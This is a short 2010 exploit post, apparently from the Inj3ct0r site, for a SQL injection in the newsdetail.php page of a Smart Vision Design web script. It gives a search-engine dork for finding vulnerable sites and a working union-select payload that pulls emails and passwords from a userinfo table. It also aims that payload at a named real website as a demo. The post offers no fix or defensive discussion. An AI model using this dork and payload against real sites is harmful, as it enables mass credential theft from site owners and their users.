Smart Vision Design (newsdetail.php) SQL Injection Vulnerability
Posted on 04 June 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Smart Vision Design (newsdetail.php) SQL Injection Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>
====================================================================
Smart Vision.com Design (newsdetail.php) SQL Injection Vulnerability
====================================================================

##########################################################
[+] Smart Vision.com Design (newsdetail.php) SQL Injection Vulnerability
[+] Discovered by : killerboy
[+] Published: 2010-06-04
##########################################################

# Script Homepage:
# http://www.esmart-vision.com/

[+]Dork: "inurl:newsdetail.php?id=" "Copyright 2010 ? Smart Vision.com All rights reserved"

[+] SQL Injection

http://[target]/newsdetail.php?id=[SQL]
http://[target]/newsdetail.php?id=-9999+union+select+1,2,concat_ws%28char%2858%29,Email,0x3a,Password%29,4,5,6,7+from+userinfo--

Demo :

http://www.mouafaqbtc.com/newsdetail.php?id=1
http://www.mouafaqbtc.com/newsdetail.php?id=-9999+union+select+1,2,concat_ws%28char%2858%29,Email,0x3a,Password%29,4,5,6,7+from+userinfo--

##########################################################
Special Thanks to : my love
greetings to my friends: R4mz3x, Z3us, Hackpsycho, K0ol, Iquitoshack, Rayok3nt, and all my friends... !!!
##########################################################

# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-04]
</pre></body></html>